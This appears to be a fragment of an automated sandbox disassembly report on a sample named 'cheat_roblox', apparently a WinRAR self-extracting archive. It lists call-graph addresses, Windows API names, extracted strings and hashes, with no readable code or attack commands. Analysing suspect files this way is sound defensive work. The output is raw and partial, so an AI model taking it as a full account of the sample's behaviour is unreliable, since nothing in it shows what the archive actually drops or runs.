27026->27028 27029 7ff693e7c6cf 27027->27029 27031 7ff693e5129c 33 API calls 27028->27031 27030 7ff693e6da98 48 API calls 27029->27030 27034 7ff693e7c6ec BuildCatchObjectHelperInternal 27030->27034 27033 7ff693e7c807 27031->27033 27032 7ff693e51fa0 31 API calls 27035 7ff693e7c783 27032->27035 27036 7ff693e51150 33 API calls 27033->27036 27034->26990 27034->27032 27037 7ff693e5250c SetDlgItemTextW 27035->27037 27038 7ff693e7c822 27036->27038 27037->27020 27372 7ff693e5e164 33 API calls 2 library calls 27038->27372 27040 7ff693e7c839 27041 7ff693e51fa0 31 API calls 27040->27041 27042 7ff693e7c845 BuildCatchObjectHelperInternal 27041->27042 27043 7ff693e51fa0 31 API calls 27042->27043 27044 7ff693e7c87f 27043->27044 27045 7ff693e51fa0 31 API calls 27044->27045 27046 
7ff693e7c88c 27045->27046 27046->26998 27047 7ff693e51fa0 31 API calls 27046->27047 27048 7ff693e7c8f3 27047->27048 27049 7ff693e5250c SetDlgItemTextW 27048->27049 27050 7ff693e7c907 27049->27050 27050->27054 27373 7ff693e7a2cc 10 API calls _handle_error 27050->27373 27052 7ff693e7c932 27053 7ff693e6aae0 48 API calls 27052->27053 27055 7ff693e7c93c 27053->27055 27054->26889 27054->26966 27054->26970 27054->27016 27056 7ff693e6da98 48 API calls 27055->27056 27058 7ff693e7c959 BuildCatchObjectHelperInternal 27056->27058 27057 7ff693e51fa0 31 API calls 27059 7ff693e7c9f0 27057->27059 27058->27009 27058->27057 27060 7ff693e5250c SetDlgItemTextW 27059->27060 27060->27054 27062 7ff693e5256a 27061->27062 27063 7ff693e525d0 27061->27063 27062->27063 27374 7ff693e6a4ac 27062->27374 27063->26720 27065 7ff693e5258f 27065->27063 27066 7ff693e525a4 GetDlgItem 27065->27066 27066->27063 27067 7ff693e525b7 27066->27067 27067->27063 27068 7ff693e525be SetDlgItemTextW 27067->27068 27068->27063 27070 7ff693e522fc 27069->27070 27071 7ff693e52334 27069->27071 27073 7ff693e5129c 33 API calls 27070->27073 27423 7ff693e523f8 GetWindowTextLengthW 27071->27423 27074 7ff693e5232a BuildCatchObjectHelperInternal 27073->27074 27075 7ff693e52389 27074->27075 27076 7ff693e51fa0 31 API calls 27074->27076 27079 7ff693e523f0 27075->27079 27080 7ff693e523c8 27075->27080 27076->27075 27077 7ff693e82320 _handle_error 8 API calls 27078 7ff693e523dd 27077->27078 27078->26749 27078->26887 27078->26985 27081 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27079->27081 27080->27077 27082 7ff693e523f5 27081->27082 27085 7ff693e58d34 27083->27085 27091 7ff693e58de8 27083->27091 27087 7ff693e58de3 27085->27087 27088 7ff693e58d91 27085->27088 27090 7ff693e58d42 BuildCatchObjectHelperInternal 27085->27090 27435 7ff693e51f80 33 API calls 3 library calls 27087->27435 27088->27090 27092 7ff693e821d0 33 API calls 27088->27092 27090->26769 27436 7ff693e52004 33 API calls std::_Xinvalid_argument 
28416 7ff693e6869a 28414->28416 28417 7ff693e540b0 33 API calls 28415->28417 28421 7ff693e6867c 28415->28421 28418 7ff693e540b0 33 API calls 28416->28418 28416->28421 28419 7ff693e6864d 28417->28419 28420 7ff693e686b3 28418->28420 28445 7ff693e5a174 28419->28445 28423 7ff693e628d0 104 API calls 28420->28423 28421->28348 28423->28421 28424->28374 28426->28364 28427->28364 28428->28364 28429->28364 28430->28368 28431->28374 28446 7ff693e5a185 28445->28446 28447 7ff693e5a19a 28446->28447 28449 7ff693e6af18 8 API calls 2 library calls 28446->28449 28447->28421 28449->28447 28455 7ff693e59be7 28450->28455 28451 7ff693e59c1b 28452 7ff693e82320 _handle_error 8 API calls 28451->28452 28453 7ff693e59c9d 28452->28453 28453->27874 28455->28451 28456 7ff693e59c83 28455->28456 28459 7ff693e59cae 28455->28459 28585 7ff693e65294 28455->28585 28605 7ff693e6db60 28455->28605 28457 7ff693e51fa0 31 API calls 28456->28457 28457->28451 28460 7ff693e59cbf 28459->28460 28609 7ff693e6da48 CompareStringW 28459->28609 28460->28456 28462 7ff693e520b0 33 API calls 28460->28462 28462->28456 28468 7ff693e65f3a 28463->28468 28464 7ff693e82320 _handle_error 8 API calls 28466 7ff693e5fb29 28464->28466 28466->27877 28536 7ff693e67c94 47 API calls 2 library calls 28466->28536 28467 7ff693e661d4 28469 7ff693e5129c 33 API calls 28468->28469 28474 7ff693e6619b 28468->28474 28476 7ff693e661ce 28468->28476 28470 7ff693e66129 28469->28470 28471 7ff693e51fa0 31 API calls 28470->28471 28472 7ff693e6613b BuildCatchObjectHelperInternal 28470->28472 28471->28472 28473 7ff693e661c9 28472->28473 28472->28474 28474->28464 28619 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 28476->28619 28535->27865 28583->27921 28584->27921 28587 7ff693e652d4 28585->28587 28591 7ff693e65312 __vcrt_FlsAlloc 28587->28591 28603 7ff693e6539e __vcrt_FlsAlloc 28587->28603 28616 7ff693e713f4 CompareStringW 28587->28616 28588 7ff693e82320 _handle_error 8 API calls 28589 7ff693e65503 28588->28589 28589->28455 28592 7ff693e65339 
28591->28592 28594 7ff693e65382 __vcrt_FlsAlloc 28591->28594 28617 7ff693e713f4 CompareStringW 28591->28617 28592->28588 28594->28592 28595 7ff693e5129c 33 API calls 28594->28595 28596 7ff693e65439 28594->28596 28594->28603 28597 7ff693e65426 28595->28597 28599 7ff693e6551b 28596->28599 28600 7ff693e65489 28596->28600 28598 7ff693e672cc 8 API calls 28597->28598 28598->28596 28602 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28599->28602 28600->28592 28600->28603 28618 7ff693e713f4 CompareStringW 28600->28618 28604 7ff693e65520 28602->28604 28603->28592 28610 7ff693e65524 28603->28610 28606 7ff693e6db73 28605->28606 28607 7ff693e520b0 33 API calls 28606->28607 28608 7ff693e6db91 28606->28608 28607->28608 28608->28455 28609->28460 28612 7ff693e65550 28610->28612 28611 7ff693e713b8 CharUpperW 28611->28612 28612->28611 28613 7ff693e655bf 28612->28613 28615 7ff693e655fd 28612->28615 28614 7ff693e65524 CharUpperW 28613->28614 28613->28615 28614->28613 28615->28592 28616->28591 28617->28594 28618->28603 28619->28467 28677->28040 28678->28046 28679->28049 28681 7ff693e687af 28680->28681 28690 7ff693e687df 28680->28690 28682 7ff693e8236c 108 API calls 28681->28682 28684 7ff693e687ca 28682->28684 28687 7ff693e8236c 108 API calls 28684->28687 28685 7ff693e8236c 108 API calls 28688 7ff693e68814 28685->28688 28686 7ff693e68845 28689 7ff693e6461c 108 API calls 28686->28689 28687->28690 28691 7ff693e8236c 108 API calls 28688->28691 28692 7ff693e68851 28689->28692 28690->28685 28693 7ff693e6882b 28690->28693 28691->28693 28694 7ff693e6461c 28693->28694 28695 7ff693e64632 28694->28695 28697 7ff693e6463a 28694->28697 28696 7ff693e6e948 108 API calls 28695->28696 28696->28697 28697->28686 28699 7ff693e6163e 28698->28699 28703 7ff693e61681 28698->28703 28702 7ff693e631bc 51 API calls 28699->28702 28699->28703 28700 7ff693e51fa0 31 API calls 28700->28703 28701 7ff693e5e600 31 API calls 28706 7ff693e616de 28701->28706 28702->28699 28703->28700 28708 7ff693e616a0 
28703->28708 28704 7ff693e6178d 28710 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28704->28710 28705 7ff693e6175b 28707 7ff693e82320 _handle_error 8 API calls 28705->28707 28706->28704 28706->28705 28709 7ff693e5e58a 28707->28709 28708->28701 28709->27670 28709->27671 28711 7ff693e61792 28710->28711 28712->27332 28713->27342 28714->27345 28715 7ff693e8bf2c 28722 7ff693e8bc34 28715->28722 28727 7ff693e8d440 35 API calls 3 library calls 28722->28727 28724 7ff693e8bc3f 28728 7ff693e8d068 35 API calls abort 28724->28728 28727->28724 28729 7ff693e811cf 28730 7ff693e81102 28729->28730 28731 7ff693e81900 _com_raise_error 14 API calls 28730->28731 28731->28730 28732 7ff693e8d94c 28733 7ff693e8d997 28732->28733 28737 7ff693e8d95b _set_fmode 28732->28737 28739 7ff693e8d69c 15 API calls _set_fmode 28733->28739 28735 7ff693e8d97e RtlAllocateHeap 28736 7ff693e8d995 28735->28736 28735->28737 28737->28733 28737->28735 28738 7ff693e8bbc0 _set_fmode 2 API calls 28737->28738 28738->28737 28739->28736
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                              • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                              • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                              Similarity
                                                                              • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                              Similarity
                                                                              • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                              • String ID: $%s:$CAPTION
                                                                              Similarity
                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                              • String ID: PNG
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: __tmp_reference_source_
                                                                              • API String ID: 3668304517-685763994
                                                                              • Opcode ID: 6a6ab8ae87e42d2bd98b89aacd7f44c20427a3495144d2f0ee9fa4d2ffa204b8
                                                                              • Instruction ID: a38f8a2b2da4ec2d23c0e0e12fdf3858601480fc265348fe5e9bd3ba5d598d83
                                                                              • Opcode Fuzzy Hash: 6a6ab8ae87e42d2bd98b89aacd7f44c20427a3495144d2f0ee9fa4d2ffa204b8
                                                                              • Instruction Fuzzy Hash: 39E27062A0C6C292EE74CB25E1463AE7769FB81784F404177DB9DA36A9CF3CE855C700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: CMT
                                                                              • API String ID: 3668304517-2756464174
                                                                              • Opcode ID: a0e24d4842010d260e039d040ceba35a1b9de8b5ad2f5c696412c3d90ececf91
                                                                              • Instruction ID: e18262f7bb78dd20ec1944f0ac193ed9ba56646298a6c2accd655a8bcecaa216
                                                                              • Opcode Fuzzy Hash: a0e24d4842010d260e039d040ceba35a1b9de8b5ad2f5c696412c3d90ececf91
                                                                              • Instruction Fuzzy Hash: CDE2DB22B0868686EF389B65D5522FE77A9EB45388F400076DB5EE76D2DF3CE455C300

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                              • String ID:
                                                                              • API String ID: 474548282-0
                                                                              • Opcode ID: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                              • Instruction ID: 36f2be145830bfec2efae1ea1d23b31455d4821314ad44302dcd070d4a9b7880
                                                                              • Opcode Fuzzy Hash: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                              • Instruction Fuzzy Hash: B361B562A0864682EA20DF25E84227E7365FB857B8F105372EBAD936D9DF3CD585C700
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CMT
                                                                              • API String ID: 0-2756464174
                                                                              • Opcode ID: ca59560c5cf5e2f2e9057fdbae45a317fcca8f6485a7e51e57a48674788a8f2b
                                                                              • Instruction ID: 8e97e68c9af825ae59bc27783b7a1913b3a6340ca7fbfc97d57573bb11df8937
                                                                              • Opcode Fuzzy Hash: ca59560c5cf5e2f2e9057fdbae45a317fcca8f6485a7e51e57a48674788a8f2b
                                                                              • Instruction Fuzzy Hash: 5942AA22B0868296EF28DB74C1522FD77A9EB51348F4011B7DB5EE7696DF38E958C300
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 572029f3924e9489f098ac62045f837f4c360eed7d1395ddfb4ea599010ef5ba
                                                                              • Instruction ID: 09b309da97bbae08ad3e737bc9298b0042edaf36f0500f71ebc272d946cfb35e
                                                                              • Opcode Fuzzy Hash: 572029f3924e9489f098ac62045f837f4c360eed7d1395ddfb4ea599010ef5ba
                                                                              • Instruction Fuzzy Hash: 67E1C362A092828BEB74CF29A0462BE7795FB44748F054176EB4FA7786DF3CE5418B04
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                              • Instruction ID: 9505e71d67ec840be009c72f68b4d053d6cac914ce5b971cea1d3fa298f487b4
                                                                              • Opcode Fuzzy Hash: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                              • Instruction Fuzzy Hash: D0B1D1A2B047C992DEAACA65D5096E96399F744FC4F488037DE0E67742DF3CE255C340
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                              • String ID:
                                                                              • API String ID: 3340455307-0
                                                                              • Opcode ID: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                              • Instruction ID: 41339e7e898d045bc163f4245effa372398f420aeacb8a5a33d409d0adbc15cd
                                                                              • Opcode Fuzzy Hash: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                              • Instruction Fuzzy Hash: C2410522B15A9687FA78DF21A90376A325AFBC4788F045036DF4DA7794DE3CE4468B04

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                              • API String ID: 1496594111-2013832382
                                                                              • Opcode ID: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                              • Instruction ID: 982f2519eb6f9fab116684a6f4ef45daa713d719718ef8de0b64458cd7236bef
                                                                              • Opcode Fuzzy Hash: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                              • Instruction Fuzzy Hash: 11320A31A09B8299EB319F64E8421E933A9FF44358F500277EA4DA77A5EF3CE655C340
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E68E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF693E68F8D
                                                                              • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF693E69F75
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E6A42F
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E6A435
                                                                                • Part of subcall function 00007FF693E70BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF693E70B44), ref: 00007FF693E70BE9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                              • API String ID: 3629253777-3268106645
                                                                              • Opcode ID: b25d02a64e189599c37322a65615bf52690cf95b5c81f30031a3f66b0c144a2e
                                                                              • Instruction ID: 230c85648df0796889b92a6f87d8c9595912781a334153f50f7515d8d43495a5
                                                                              • Opcode Fuzzy Hash: b25d02a64e189599c37322a65615bf52690cf95b5c81f30031a3f66b0c144a2e
                                                                              • Instruction Fuzzy Hash: E162B062E1968285EB30DF25D4462BD33AAFB40788F805173EB5EA7695EF3CE944C341

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                              • String ID: H
                                                                              • API String ID: 3432403771-2852464175
                                                                              • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                              • Instruction ID: d45c564a5d3cffc10c2af2dc9a8b465ca75d98ac3c0727cb50e75c895dc56cf0
                                                                              • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                              • Instruction Fuzzy Hash: D0912B32E05B568AEB60CFA5D8466AC33B9FB08B98F454576DE0DA7754EF38E845C300

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                              • String ID: .exe$.inf$Install$p
                                                                              • API String ID: 1054546013-3607691742
                                                                              • Opcode ID: b874a5522ab24c4bf8c8fdcb584493d20a75b8ddd416e54ebb3c32214babb66c
                                                                              • Instruction ID: f3e1278aa8b4932c38e126b390afff583bfbc8f26534bfdb8735f62e378e3565
                                                                              • Opcode Fuzzy Hash: b874a5522ab24c4bf8c8fdcb584493d20a75b8ddd416e54ebb3c32214babb66c
                                                                              • Instruction Fuzzy Hash: EFC16262F1860295FE20CB65D9522B92379EF857C4F0444B7DA4EE7AA6DF3CE8528304

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
